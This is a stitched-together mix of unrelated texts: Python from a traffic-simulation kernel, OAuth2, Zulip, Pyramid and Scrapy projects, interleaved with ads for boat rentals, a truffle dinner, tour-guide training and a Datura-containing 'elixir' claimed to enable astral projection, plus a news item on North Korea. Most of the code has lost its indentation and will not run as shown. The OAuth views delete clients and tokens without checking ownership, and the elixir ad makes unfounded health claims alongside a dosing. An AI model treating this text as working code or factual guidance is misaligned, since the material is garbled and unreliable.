this_pos = self.get_position(veh_id)
this_edge = self.get_edge(veh_id)
this_lane = self.get_lane(veh_id)
num_lanes = self.master_kernel.scenario.num_lanes(this_edge)
# set default values for all output values
headway = [1000] * num_lanes
tailway = [1000] * num_lanes
leader = [""] * num_lanes
follower = [""] * num_lanes
for lane in range(num_lanes):
# check the vehicle's current edge for lane leaders and followers
if len(edge_dict[this_edge][lane]) > 0:
ids, positions = zip(*edge_dict[this_edge][lane])
ids = list(ids)
positions = list(positions)
index = bisect_left(positions, this_pos)
                # check whether a candidate leader exists on this edge; if
                # not, the lane leader is in the edges in front of you
if (lane == this_lane and index < len(positions) - 1) \
or (lane != this_lane and index < len(positions)):
# check if the index does not correspond to the current
# vehicle
if ids[index] == veh_id:
leader[lane] = ids[index + 1]
headway[lane] = (positions[index + 1] - this_pos -
self.get_length(leader[lane]))
else:
leader[lane] = ids[index]
headway[lane] = (positions[index] - this_pos
- self.get_length(leader[lane]))
                # if there is a vehicle behind you in this lane, it is the
                # lane follower
if index > 0:
follower[lane] = ids[index - 1]
tailway[lane] = (this_pos - positions[index - 1]
- self.get_length(veh_id))
# if lane leader not found, check next edges
if leader[lane] == "":
headway[lane], leader[lane] = self._next_edge_leaders(
veh_id, edge_dict, lane, num_edges)
# if lane follower not found, check previous edges
if follower[lane] == "":
tailway[lane], follower[lane] = self._prev_edge_followers(
veh_id, edge_dict, lane, num_edges)
return headway, tailway, leader, follower
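The same-edge search above hinges on `bisect_left` over the position-sorted lane list: the insertion index of the ego position splits the lane into candidate followers (below) and leaders (above). A self-contained sketch of that lookup (the vehicle names are illustrative):

```python
from bisect import bisect_left

# vehicles in one lane, sorted by position: (vehicle id, position)
lane = [("veh0", 10.0), ("veh1", 35.0), ("veh2", 60.0)]
ids = [veh[0] for veh in lane]
positions = [veh[1] for veh in lane]

this_pos = 35.0  # ego vehicle "veh1"
index = bisect_left(positions, this_pos)  # insertion point of the ego

# the entry at index is the ego itself, so the leader is one ahead
leader = ids[index + 1] if index < len(ids) - 1 else ""
follower = ids[index - 1] if index > 0 else ""
print(leader, follower)
```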
def _next_edge_leaders(self, veh_id, edge_dict, lane, num_edges):
"""Search for leaders in the next edge.
Looks to the edges/junctions in front of the vehicle's current edge
for potential leaders. This is currently done by only looking one
edge/junction forwards.
Returns
-------
headway : float
lane headway for the specified lane
leader : str
lane leader for the specified lane
"""
pos = self.get_position(veh_id)
edge = self.get_edge(veh_id)
headway = 1000 # env.scenario.length
leader = ""
add_length = 0 # length increment in headway
for _ in range(num_edges):
            # break if there are no edge/lane pairs in front of the current
            # one
if len(self.master_kernel.scenario.next_edge(edge, lane)) == 0:
break
add_length += self.master_kernel.scenario.edge_length(edge)
edge, lane = self.master_kernel.scenario.next_edge(edge, lane)[0]
try:
if len(edge_dict[edge][lane]) > 0:
leader = edge_dict[edge][lane][0][0]
headway = edge_dict[edge][lane][0][1] - pos + add_length \
- self.get_length(leader)
except KeyError:
# current edge has no vehicles, so move on
# print(traceback.format_exc())
continue
            # stop if a lane leader is found
if leader != "":
break
return headway, leader
def _prev_edge_followers(self, veh_id, edge_dict, lane, num_edges):
"""Search for followers in the previous edge.
Looks to the edges/junctions behind the vehicle's current edge for
potential followers. This is currently done by only looking one
edge/junction backwards.
Returns
-------
tailway : float
lane tailway for the specified lane
follower : str
lane follower for the specified lane
"""
pos = self.get_position(veh_id)
edge = self.get_edge(veh_id)
tailway = 1000 # env.scenario.length
follower = ""
add_length = 0 # length increment in headway
for _ in range(num_edges):
# break if there are no edge/lane pairs behind the current one
if len(self.master_kernel.scenario.prev_edge(edge, lane)) == 0:
break
edge, lane = self.master_kernel.scenario.prev_edge(edge, lane)[0]
add_length += self.master_kernel.scenario.edge_length(edge)
try:
if len(edge_dict[edge][lane]) > 0:
tailway = pos - edge_dict[edge][lane][-1][1] + add_length \
- self.get_length(veh_id)
follower = edge_dict[edge][lane][-1][0]
except KeyError:
# current edge has no vehicles, so move on
# print(traceback.format_exc())
continue
# stop if a lane follower is found
if follower != "":
break
return tailway, follower
def apply_acceleration(self, veh_ids, acc):
"""See parent class."""
        # to handle the case of a single vehicle
if type(veh_ids) == str:
veh_ids = [veh_ids]
acc = [acc]
for i, vid in enumerate(veh_ids):
if acc[i] is not None and vid in self.get_ids():
this_vel = self.get_speed(vid)
next_vel = max([this_vel + acc[i] * self.sim_step, 0])
self.kernel_api.vehicle.slowDown(vid, next_vel, 1e-3)
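The acceleration command above is a first-order Euler update on speed, clipped at zero since vehicles cannot drive backwards, before being handed to TraCI's `slowDown`. The update itself, as a standalone helper (our name, not part of the class):

```python
def next_speed(current_speed, accel, sim_step):
    """First-order Euler speed update, clipped at zero."""
    return max(current_speed + accel * sim_step, 0)

print(next_speed(5.0, -2.0, 0.1))  # decelerating from 5 m/s
print(next_speed(0.1, -5.0, 0.1))  # clipped: the vehicle stops, not reverses
```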
def apply_lane_change(self, veh_ids, direction):
"""See parent class."""
        # to handle the case of a single vehicle
if type(veh_ids) == str:
veh_ids = [veh_ids]
direction = [direction]
# if any of the directions are not -1, 0, or 1, raise a ValueError
if any(d not in [-1, 0, 1] for d in direction):
raise ValueError(
"Direction values for lane changes may only be: -1, 0, or 1.")
for i, veh_id in enumerate(veh_ids):
# check for no lane change
if direction[i] == 0:
continue
            # compute the target lane, and clip it so vehicles don't try to
            # lane change out of range
this_lane = self.get_lane(veh_id)
this_edge = self.get_edge(veh_id)
target_lane = min(
max(this_lane + direction[i], 0),
self.master_kernel.scenario.num_lanes(this_edge) - 1)
            # perform the requested lane change action in TraCI
if target_lane != this_lane:
self.kernel_api.vehicle.changeLane(
veh_id, int(target_lane), 100000)
if veh_id in self.get_rl_ids():
self.prev_last_lc[veh_id] = \
self.__vehicles[veh_id]["last_lc"]
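Before issuing the TraCI call, the lane-change direction is clipped so the target lane stays inside the edge's lane range; a request off the edge simply degenerates to "no change". Sketched in isolation:

```python
def clipped_target_lane(current_lane, direction, num_lanes):
    """Clamp a lane-change request to the valid range [0, num_lanes - 1]."""
    return min(max(current_lane + direction, 0), num_lanes - 1)

# a right change from the rightmost lane degenerates to "stay put"
print(clipped_target_lane(0, -1, 3))
# a left change from the leftmost lane likewise
print(clipped_target_lane(2, 1, 3))
print(clipped_target_lane(1, 1, 3))
```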
def choose_routes(self, veh_ids, route_choices):
"""See parent class."""
        # to handle the case of a single vehicle
if type(veh_ids) == str:
veh_ids = [veh_ids]
route_choices = [route_choices]
for i, veh_id in enumerate(veh_ids):
if route_choices[i] is not None:
self.kernel_api.vehicle.setRoute(
vehID=veh_id, edgeList=route_choices[i])
def get_x_by_id(self, veh_id):
"""See parent class."""
if self.get_edge(veh_id) == '':
            # occurs when a vehicle has crashed or has been teleported for
            # some other reason
return 0.
return self.master_kernel.scenario.get_x(
self.get_edge(veh_id), self.get_position(veh_id))
def update_vehicle_colors(self):
"""See parent class.
The colors of all vehicles are updated as follows:
- red: autonomous (rl) vehicles
- white: unobserved human-driven vehicles
- cyan: observed human-driven vehicles
"""
for veh_id in self.get_rl_ids():
try:
# color rl vehicles red
self.set_color(veh_id=veh_id, color=RED)
except (FatalTraCIError, TraCIException) as e:
print('Error when updating rl vehicle colors:', e)
print(traceback.format_exc())
# color vehicles white if not observed and cyan if observed
for veh_id in self.get_human_ids():
try:
color = CYAN if veh_id in self.get_observed_ids() else WHITE
self.set_color(veh_id=veh_id, color=color)
except (FatalTraCIError, TraCIException) as e:
print('Error when updating human vehicle colors:', e)
print(traceback.format_exc())
# clear the list of observed vehicles
for veh_id in self.get_observed_ids():
self.remove_observed(veh_id)
def get_color(self, veh_id):
"""See parent class.
This does not pass the last term (i.e. transparency).
"""
r, g, b, t = self.kernel_api.vehicle.getColor(veh_id)
return r, g, b
def set_color(self, veh_id, color):
"""See parent class.
The last term for sumo (transparency) is set to 255.
"""
if self._color_vehicles:
r, g, b = color
self.kernel_api.vehicle.setColor(
vehID=veh_id, color=(r, g, b, 255))
def add(self, veh_id, type_id, edge, pos, lane, speed):
"""See parent class."""
if veh_id in self.master_kernel.scenario.rts:
# If the vehicle has its own route, use that route. This is used in
# the case of network templates.
route_id = 'route{}_0'.format(veh_id)
else:
num_routes = len(self.master_kernel.scenario.rts[edge])
frac = [val[1] for val in self.master_kernel.scenario.rts[edge]]
route_id = 'route{}_{}'.format(edge, np.random.choice(
[i for i in range(num_routes)], size=1, p=frac)[0])
self.kernel_api.vehicle.addFull(
veh_id,
route_id,
typeID=str(type_id),
departLane=str(lane),
departPos=str(pos),
departSpeed=str(speed))
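When the vehicle has no template route of its own, a route leaving the departure edge is drawn at random with the probabilities stored in `scenario.rts`. The sampling reduces to a weighted choice over route indices; a standalone sketch using the stdlib instead of NumPy (the route table below is made up):

```python
import random

# made-up route table: routes leaving "edge0" and their choice probabilities
rts = {"edge0": [(["edge0", "edge1"], 0.7), (["edge0", "edge2"], 0.3)]}

edge = "edge0"
frac = [val[1] for val in rts[edge]]

random.seed(0)  # reproducible draw for the example
# random.choices with weights mirrors np.random.choice(..., p=frac)
route_index = random.choices(range(len(rts[edge])), weights=frac, k=1)[0]
route_id = 'route{}_{}'.format(edge, route_index)
print(route_id)
```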
def get_max_speed(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_max_speed(vehID, error) for vehID in veh_id]
return self.kernel_api.vehicle.getMaxSpeed(veh_id)
def set_max_speed(self, veh_id, max_speed):
"""See parent class."""
self.kernel_api.vehicle.setMaxSpeed(veh_id, max_speed)
|
Fantasea Bermuda offers the best local boat rentals! Book the Eco-Express today!
This powered catamaran is a unique vessel with an extremely shallow draft that can accommodate a wide variety of water-based adventures, which means we can go just about anywhere! We can snorkel the outer reefs, visit hidden beaches, and transport our kayak safaris to remote coral gardens.
|
"""
Mock responses
"""
from httpretty import HTTPretty
from .stubdata.solr import example_solr_response
import json
class HTTPrettyMock(object):
"""
httpretty context manager scaffolding
"""
def __enter__(self):
HTTPretty.enable()
def __exit__(self, etype, value, traceback):
"""
:param etype: exit type
:param value: exit value
:param traceback: the traceback for the exit
"""
HTTPretty.reset()
HTTPretty.disable()
class MockSolrResponse(HTTPrettyMock):
"""
context manager that mocks a Solr response
"""
def __init__(self, api_endpoint):
"""
:param api_endpoint: name of the API end point
"""
self.api_endpoint = api_endpoint
def request_callback(request, uri, headers):
"""
:param request: HTTP request
:param uri: URI/URL to send the request
:param headers: header of the HTTP request
:return: httpretty response
"""
resp = json.loads(example_solr_response)
resp['responseHeader'] = {'params': request.parsed_body}
# Mimic the start, rows behaviour
rows = int(
request.parsed_body.get(
'rows', [len(resp['response']['docs'])]
)[0]
)
            start = int(request.parsed_body.get('start', [0])[0])
try:
resp['response']['docs'] = resp['response']['docs'][start:start+rows]
except IndexError:
resp['response']['docs'] = resp['response']['docs'][start:]
# Mimic the filter "fl" behaviour
fl = request.parsed_body['fl'][0].split(',')
resp['response']['docs'] = [
{field: doc.get(field) for field in fl}
for doc in resp['response']['docs']
]
return 200, headers, json.dumps(resp)
HTTPretty.register_uri(
HTTPretty.POST,
self.api_endpoint,
body=request_callback,
content_type="application/json"
)
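The `start`/`rows` emulation in `request_callback` boils down to a plain list slice over the stubbed documents; out-of-range values fall through harmlessly because Python slicing never raises. For instance (a hypothetical `paginate` helper):

```python
def paginate(docs, start=0, rows=None):
    """Emulate Solr's start/rows parameters with a plain list slice."""
    if rows is None:
        rows = len(docs)
    return docs[start:start + rows]

docs = [{"id": i} for i in range(10)]
print([d["id"] for d in paginate(docs, start=3, rows=4)])
print([d["id"] for d in paginate(docs, start=8, rows=4)])  # short final page
```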
|
A 5-course white truffle dinner. This year, Chef Michele has designed some exciting dishes that complement the profile of white truffles. The 5-course dinner is food only; the final price of $250/person does not include taxes and tips.
This ticket guarantees a seat at the event; your final bill will be the cost per person less the deposit collected here.
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 24 15:50:53 2015
@author: Niklas Bendixen
"""
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/topics/item-pipeline.html
from scrapy import signals # http://doc.scrapy.org/en/1.0/topics/signals.html
from scrapy.exporters import XmlItemExporter # http://doc.scrapy.org/en/1.0/topics/exporters.html#xmlitemexporter
class XmlExportPipeline(object):
def __init__(self):
self.files = {}
@classmethod
def from_crawler(cls, crawler):
pipeline = cls()
crawler.signals.connect(pipeline.spider_opened, signals.spider_opened)
crawler.signals.connect(pipeline.spider_closed, signals.spider_closed)
return pipeline
    def spider_opened(self, spider):
        # use the spider's first allowed domain as the output file name
        xml_name = spider.allowed_domains[0]
file = open('../../output/%s_crawled.xml' % xml_name, 'w+b')
self.files[spider] = file
self.exporter = XmlItemExporter(file, root_element = 'root', item_element = 'item')
self.exporter.start_exporting()
def spider_closed(self, spider):
self.exporter.finish_exporting()
file = self.files.pop(spider)
file.close()
def process_item(self, item, spider):
self.exporter.export_item(item)
return item
|
Education: Receive individual coaching from experienced role models and mentors who are all active tour directors. The ITMI faculty provide real-world, hands-on, practical training in both the classroom and in the field. You will learn everything you need to know to begin living your dream as a tour director or guide.
Partnership: Over 8,000 alumni have built our reputation. Your success is our success. Our partnership with you extends for the life of your career and far beyond our job placement assistance, including access to the exclusive ITMI Alumni Portal for news and tools to help you to become more successful.
Community: You have now joined the world's largest network of Professional Tour Directors and Guides. Follow your colleagues via ITMI’s Facebook page, LinkedIn and Twitter and more to network, discuss issues and share your stories! Each year after graduation you are eligible to attend our 5-day Annual ITMI Symposium and Reunion, for continuing education, destination knowledge, networking opportunities with your colleagues and employment opportunities with a wide variety of ITMI Tour Operator partners.
Is Tour Guiding or Tour Directing Right for Me?
Once you apply to the International Tour Management Institute, we’ll schedule a no-obligation interview to learn more about each other and answer your questions about tour directing and us. Of the many who apply to ITMI, only a select few (20-25 students per class) are invited to attend our training program.
The most successful applicants are mature, interested and skilled in working with groups of people, and love traveling. ITMI’s goal is to equip you with the tools, individual attention, and direction you need to become a successful tour guide or tour director.
Think you’re too young or too old? To ITMI, your desire to make a difference in the world as an ambassador of goodwill is far more important than your age! You are not alone in wanting to travel and make a difference. You are important and your dreams are valued here.
What Does a Tour Guide or Tour Director Do?
Tour guiding and tour directing are dream careers that many people would love to have. What’s not to love about visiting exotic places and having once-in-a-lifetime experiences daily while making a great living? When people go on tours, they experience joy and fulfillment in their purest forms. Tour guides and tour directors connect with guests in deep, meaningful ways, and those guests recount those experiences for the rest of their lives. Likewise, all tour guides and tour directors have amazing stories of cherished moments with their guests on tour.
A tour guide may conduct walking tours, food & wine tours, regularly scheduled tours, and many more types. Tour guides provide local expertise and bring their cities to life! They may also work as travel staffers with local conventions and incentive travel bureaus. Some guides prefer to work only within their city, so they can do what they love and still go home at night to their family and friends.
Tour directors lead groups over the road. They’re also known as tour managers, adventure guides, course leaders, and tour escorts. They travel with the group throughout the tour, managing the details and enjoying the amazing sights and experiences. They may do this relatively close to home or halfway across the world – it all depends on the assignment. There are opportunities available to suit all preferences.
Do I have to choose between working as a tour guide or tour director?
No, not at all. Most graduates do both and enjoy a balance of home and away. The rewards of working as a tour guide or tour director are beyond measure. Making a difference in the world and in the lives of the people with whom you travel is mutually beneficial. Tour guides and tour directors educate and inspire their guests to discover new perspectives. They create bridges of understanding between people and cultures.
It’s time to bridge the gap between your passion and your career. Learn more about our 15-day Tour Guide / Director Certification Program. Ready to take the next step? Apply to ITMI today!
|
"""Views for django_oauth2_lite application."""
from django.shortcuts import render_to_response, get_object_or_404
from django_oauth2_lite.models import Client, scope_by_name, code_by_token, token_by_value,\
Scope, Token
from django_oauth2_lite.forms import CodeForm, ClientForm
from django.http import HttpResponseBadRequest, HttpResponse,\
HttpResponseRedirect
from django.utils import simplejson
from django_oauth2_lite.decorators import clientauth_required
from django.views.generic.list_detail import object_list
from django.contrib.auth.decorators import login_required
def _get(request, key, dflt=None):
    return request.GET.get(key, dflt)
def _post(request, key, dflt=None):
    return request.POST.get(key, dflt)
def response_dict(request,d):
if request.user.is_authenticated():
d['user'] = request.user
if request.user and hasattr(request.user,'get_profile'):
d['profile'] = request.user.get_profile()
return d
@login_required
def do_authorize(request,state,template_name):
client = get_object_or_404(Client,client_id=_get(request,'client_id'))
if _get(request,'response_type','code') != 'code':
return client.redirect({'error': 'unsupported_response_type','state': state})
code = client.new_authz_code(owner=request.user,state=state)
for n in _get(request,'scope',"").split(' '):
scope = scope_by_name(n)
if scope == None:
return client.redirect({'error': 'invalid_scope','state': state})
code.token.scopes.add(scope)
form = CodeForm(instance=code)
form.fields['code'].initial = code.token.value
return render_to_response(template_name,response_dict(request,{"form": form, 'client': code.token.client, 'scopes': code.token.scopes}))
def authorize(request,template_name='django_oauth2_lite/authorize.html'):
state = None
    if 'state' in request.REQUEST:
        state = request.REQUEST['state']
if request.method == 'POST':
form = CodeForm(request.POST)
if form.is_valid():
            code = code_by_token(form.cleaned_data['code'])
            if code == None:
                # an unknown code has no client to redirect back to
                return HttpResponseBadRequest('invalid_request')
if form.cleaned_data['authorized']:
code.authorized = True
code.save()
return code.token.client.redirect({'state': state,'code': code.token.value})
else:
code.token.delete()
code.delete()
return code.token.client.redirect({'error': 'access_denied','state': state})
else:
return code.token.client.redirect({'error': 'invalid_request','state': state})
else:
return do_authorize(request,state,template_name)
def json_response(data):
r = HttpResponse(simplejson.dumps(data),content_type='application/json')
r['Cache-Control'] = 'no-store'
r['Pragma'] = 'no-cache'
return r
def token_error(error):
return json_response({'error': error})
@clientauth_required
def token(request):
if not request.method == 'POST':
return HttpResponseBadRequest()
grant_type = _post(request,'grant_type')
at = None
if grant_type == 'authorization_code':
code = code_by_token(_post(request,'code'))
if not code:
return token_error('invalid_grant')
if not code.is_valid():
if code.token:
if code.token.refresh_token:
code.token.refresh_token.delete()
code.token.delete()
code.delete()
return token_error('invalid_grant')
at = code.new_access_token()
elif grant_type == 'refresh_token':
rt = token_by_value(_post(request,'refresh_token'))
if not rt:
return token_error('invalid_grant')
if not rt.is_valid():
rt.delete()
return token_error('invalid_grant')
## TODO: scope is silently ignored right now - should honor request to narrow scope
at = rt.client.new_access_token(rt.owner, refresh_token=rt)
else:
return token_error('unsupported_grant_type')
return json_response({'access_token': at.value,
'token_type': at.type(),
'expires_in': 3600,
'refresh_token': at.refresh_token.value})
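On success the endpoint returns the standard OAuth2 token payload (cf. RFC 6749, section 5.1), with `expires_in` hard-coded to one hour here. Its shape, isolated as a hypothetical helper:

```python
def token_response(access_token, token_type, refresh_token, expires_in=3600):
    """Dict mirroring the JSON body built by the token() view above."""
    return {'access_token': access_token,
            'token_type': token_type,
            'expires_in': expires_in,
            'refresh_token': refresh_token}

body = token_response('abc123', 'bearer', 'xyz789')
print(sorted(body))
```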
@login_required
def clients(request,template_name='django_oauth2_lite/clients.html'):
queryset = Client.objects.filter(owner=request.user)
return object_list(request,
template_object_name='client',
queryset=queryset,
template_name=template_name)
@login_required
def tokens(request,template_name='django_oauth2_lite/tokens.html'):
queryset = Token.objects.filter(owner=request.user,refresh_token=None)
return object_list(request,
template_object_name='token',
queryset=queryset,
template_name=template_name)
@login_required
def add_client(request,template_name="django_oauth2_lite/client_form.html"):
if request.method == 'POST':
client = Client(owner=request.user)
form = ClientForm(request.POST,request.FILES,instance=client)
if form.is_valid():
form.save()
return HttpResponseRedirect("../clients")
else:
form = ClientForm()
return render_to_response(template_name,response_dict(request,{'form': form}))
@login_required
def remove_client(request,id):
client = get_object_or_404(Client,id=id)
if client:
client.delete()
return HttpResponseRedirect("../../clients")
@login_required
def remove_token(request,id):
token = get_object_or_404(Token,id=id)
if token:
token.delete()
return HttpResponseRedirect("../../tokens")
# Manage scopes in the admin view
def callback(request,template_name="django_oauth2_lite/callback.html"):
return render_to_response(template_name,response_dict(request,{'error': _get(request,'error'),
'state': _get(request,'state'),
'code': _get(request,'code')}))
@login_required
def test_client(request,id,template_name='django_oauth2_lite/test.html'):
client = get_object_or_404(Client,id=id)
return render_to_response(template_name,response_dict(request,{'client': client,'scopes': Scope.objects.all()}))
@login_required
def scopes(request,template_name='django_oauth2_lite/scopes.html'):
queryset = Scope.objects.all()
return object_list(request,
template_object_name='scope',
queryset=queryset,
template_name=template_name)
|
AAAnd the Oscar goes toooo ... ? This year we are going to celebrate a Hollywood & Movies party. Every year we invite all Agile Testing Days participants to a big social event in a relaxed atmosphere, paired with delicious food and an entertainment program. This evening is all about fun, networking and dancing. Since 2011, we have honored the Most Influential Agile Testing Professional Person (MIATPP) of the year in a lavish awards ceremony.
This year’s dress code: glamour, glitter, movie hero costumes, movie or TV characters, Hollywood outfits or accessories, from Marilyn Monroe to Steven Spielberg to Rambo or Pennywise!
After a good and proper Oktoberfest in 2010, a spooky Halloween Party in 2013, a crazy Carnival Night in 2014, a really wild “Wild Wild West” party in 2015, a "Ho-Ho-Holy", but not Silent Night in 2016 and a FUNTESTIC Super Hero Night last year, it is already a tradition to masquerade during the MIATPP Award Night!
Don’t miss our exciting party and please make sure to get dressed in a costume or to wear at least some funny accessories. During the online registration process make sure to mark the check box for the social event to participate for free. Seats are limited to only 400! On the day of the event you will receive your ticket for the Social Event at the registration booth!
Please note: we are giving away free conference tickets for the best costumes as we did in 2013, 2014, 2015, 2016 & 2017!
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright 2010-2012 Asidev s.r.l.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from aybu.manager.models.validators import (validate_hostname,
check_domain_not_used)
from aybu.manager.exc import ParamsError
from aybu.manager.models import (Instance,
Redirect)
from pyramid.view import view_config
from sqlalchemy.orm.exc import NoResultFound
@view_config(route_name='redirects', request_method=('HEAD', 'GET'))
def list(context, request):
return {r.source: r.to_dict() for r in Redirect.all(request.db_session)}
@view_config(route_name='redirects', request_method='POST',
renderer='taskresponse')
def create(context, request):
try:
source = validate_hostname(request.params['source'])
instance = Instance.get_by_domain(request.db_session,
request.params['destination'])
http_code = request.params.get('http_code', 301)
target_path = request.params.get('target_path', '')
check_domain_not_used(request, source)
except KeyError as e:
raise ParamsError(e)
except NoResultFound:
raise ParamsError('No instance for domain {}'\
.format(request.params['destination']))
else:
params = dict(source=source, instance_id=instance.id,
http_code=http_code, target_path=target_path)
return request.submit_task('redirect.create', **params)
@view_config(route_name='redirect', request_method=('HEAD', 'GET'))
def info(context, request):
return Redirect.get(request.db_session,
request.matchdict['source']).to_dict()
@view_config(route_name='redirect', request_method='DELETE',
renderer='taskresponse')
def delete(context, request):
source = request.matchdict['source']
Redirect.get(request.db_session, source)
return request.submit_task('redirect.delete', source=source)
@view_config(route_name='redirect', request_method='PUT',
renderer='taskresponse')
def update(context, request):
params = dict()
source = request.matchdict['source']
Redirect.get(request.db_session, source)
specs = (
('new_source', check_domain_not_used, [request]),
('destination', Instance.get_by_domain, [request.db_session]),
('http_code', None, None),
('target_path', None, None)
)
try:
for attr, validate_fun, fun_args in specs:
if attr in request.params:
if validate_fun:
fun_args.append(request.params[attr])
params[attr] = validate_fun(*fun_args)
else:
params[attr] = request.params[attr]
except NoResultFound:
raise ParamsError("No instance for domain {}"\
.format(request.params['destination']))
if not params:
raise ParamsError("Missing update fields")
params['source'] = source
if "destination" in params:
params['instance_id'] = params['destination'].id
del params['destination']
if "new_source" in params:
params['new_source'] = validate_hostname(params['new_source'])
return request.submit_task('redirect.update', **params)
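The `specs` table in `update` drives validation generically: each entry names a parameter, an optional validator, and the validator's base arguments. A self-contained sketch of the same pattern (the `validate_params` helper and its example specs are hypothetical, not part of aybu):

```python
def validate_params(params, specs):
    # Each spec is (name, validator, base_args): the validator is called
    # with base_args plus the raw value; a validator of None passes the
    # raw value through unchanged.
    out = {}
    for name, validate, args in specs:
        if name in params:
            raw = params[name]
            out[name] = validate(*(list(args) + [raw])) if validate else raw
    return out

specs = (
    ("http_code", lambda v: int(v), []),
    ("target_path", None, None),
)
assert validate_params({"http_code": "302"}, specs) == {"http_code": 302}
assert validate_params({"target_path": "/x"}, specs) == {"target_path": "/x"}
```

Copying `args` before appending (unlike the in-place `fun_args.append` above) keeps each spec reusable across calls.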
|
Are you ready to do some exploring? This elixir supports a meditation practice that aims for astral projection, dream walking, and communication with the divine. Excellent for ritual and divination work. May also be used to stimulate sleep and enhance dreaming.
As a stone of connectivity, Moldavite gem essence carries an intense frequency, a fusion of earthly and extraterrestrial energies that are quickly felt, often dramatically in those who resonate with its power. It is a wonderful essence for connecting to your light-self and moving through the veil. Angel's Trumpet flower essence allows one to feel a kind of spiritual surrender, opening the heart to the spiritual world. An excellent flower essence for moving through transformative rebirthing processes, it facilitates profound soul opening.
Ingredients: Mount Shasta spring water, Moldavite gem essence, Angel's trumpet (Datura) flower essence, Mugwort, Fennel, Lavender, Valerian root, Alcohol, Local honey.
* A typical dose is 30 drops in water or under the tongue; depending on age, weight, and sensitivity, you may find that more or less works for you.
|
from django.http import HttpResponse, HttpRequest
from django.utils.translation import ugettext as _
from typing import List, Text
from zerver.context_processors import get_realm_from_request
from zerver.lib.actions import check_add_user_group, do_update_user_group_name, \
do_update_user_group_description, bulk_add_members_to_user_group, \
remove_members_from_user_group, check_delete_user_group
from zerver.lib.exceptions import JsonableError
from zerver.lib.request import has_request_variables, REQ
from zerver.lib.response import json_success, json_error
from zerver.lib.users import user_ids_to_users
from zerver.lib.validator import check_list, check_string, check_int, \
check_short_string
from zerver.lib.user_groups import access_user_group_by_id, get_memberships_of_users
from zerver.models import UserProfile, UserGroup, UserGroupMembership
from zerver.views.streams import compose_views, FuncKwargPair
@has_request_variables
def add_user_group(request, user_profile,
name=REQ(),
members=REQ(validator=check_list(check_int), default=[]),
description=REQ()):
# type: (HttpRequest, UserProfile, Text, List[int], Text) -> HttpResponse
user_profiles = user_ids_to_users(members, user_profile.realm)
check_add_user_group(user_profile.realm, name, user_profiles, description)
return json_success()
@has_request_variables
def edit_user_group(request, user_profile,
user_group_id=REQ(validator=check_int),
name=REQ(default=""), description=REQ(default="")):
# type: (HttpRequest, UserProfile, int, Text, Text) -> HttpResponse
if not (name or description):
return json_error(_("No new data supplied"))
user_group = access_user_group_by_id(user_group_id, realm=user_profile.realm)
result = {}
    if name and name != user_group.name:
        do_update_user_group_name(user_group, name)
        result['name'] = _("Name successfully updated.")
    if description and description != user_group.description:
        do_update_user_group_description(user_group, description)
        result['description'] = _("Description successfully updated.")
return json_success(result)
@has_request_variables
def delete_user_group(request: HttpRequest, user_profile: UserProfile,
user_group_id: int=REQ(validator=check_int)) -> HttpResponse:
check_delete_user_group(user_group_id, user_profile.realm)
return json_success()
@has_request_variables
def update_user_group_backend(request, user_profile,
user_group_id=REQ(validator=check_int),
delete=REQ(validator=check_list(check_int), default=[]),
add=REQ(validator=check_list(check_int), default=[])):
# type: (HttpRequest, UserProfile, int, List[int], List[int]) -> HttpResponse
if not add and not delete:
return json_error(_('Nothing to do. Specify at least one of "add" or "delete".'))
method_kwarg_pairs = [
(add_members_to_group_backend,
dict(user_group_id=user_group_id, members=add)),
(remove_members_from_group_backend,
dict(user_group_id=user_group_id, members=delete))
] # type: List[FuncKwargPair]
return compose_views(request, user_profile, method_kwarg_pairs)
def add_members_to_group_backend(request: HttpRequest, user_profile: UserProfile,
user_group_id: int, members: List[int]) -> HttpResponse:
if not members:
return json_success()
user_group = access_user_group_by_id(user_group_id, user_profile.realm)
user_profiles = user_ids_to_users(members, user_profile.realm)
existing_member_ids = set(get_memberships_of_users(user_group, user_profiles))
    for member in user_profiles:
        if member.id in existing_member_ids:
            raise JsonableError(_("User %s is already a member of this group") % (member.id,))
bulk_add_members_to_user_group(user_group, user_profiles)
return json_success()
def remove_members_from_group_backend(request: HttpRequest, user_profile: UserProfile,
user_group_id: int, members: List[int]) -> HttpResponse:
if not members:
return json_success()
user_profiles = user_ids_to_users(members, user_profile.realm)
user_group = access_user_group_by_id(user_group_id, user_profile.realm)
remove_members_from_user_group(user_group, user_profiles)
return json_success()
|
North Korea's Vice Foreign Minister has blamed President Donald Trump for 'making trouble' through his 'aggressive tweets' as tensions rise over the possibility the regime will launch another nuclear weapons test.
Vice Minister Han Song Ryol sat down for an interview with the Associated Press on the eve of the country's biggest national holiday, the 'Day of the Sun', amid increasingly bitter words between the two countries.
His remarks come hours after a member of the Trump administration denied a report claiming the US was prepared to launch a pre-emptive strike to halt any nuclear test at the weekend.
North Korea blames Trump and the U.S. for the rising tensions, according to Han, who cited US-South Korean wargames, the deployment of a US aircraft carrier to the peninsula last weekend, as well as Trump's recent tweets on Tuesday that the North is 'looking for trouble'.
|
#!/usr/bin/env python
"""
clim.py
ROMS climatology utilities
Written by Brian Powell on 08/15/15
Copyright (c)2017 University of Hawaii under the BSD-License.
"""
import seapy
import numpy as np
import netCDF4
clim_times = ('zeta_time', 'v2d_time', 'v3d_time', 'temp_time', 'salt_time')
def gen_bry_clim(clim_file, grid, bry):
"""
Taking the results of gen_ncks and interpolation, stitch together
climatology files that were interpolated using only the boundary regions
into a single climatology (with no data where interpolation wasn't
performed).
Parameters
----------
clim_file: str,
The name of the output climate file
grid: seapy.model.grid or str,
The output ROMS grid
bry: dict,
A dictionary prescribing the climatology file interpolated for each
boundary side.
{"west":filename, "south":filename}, ...}
Returns
-------
None
"""
grid = seapy.model.asgrid(grid)
# Grab the first dictionary record and use it to determine the number
# of times in the new climatology file
nc = netCDF4.Dataset(bry[list(bry.keys())[0]])
reftime, time = seapy.roms.get_reftime(nc)
times = nc.variables[time][:]
nc.close()
# Create the new climatology file
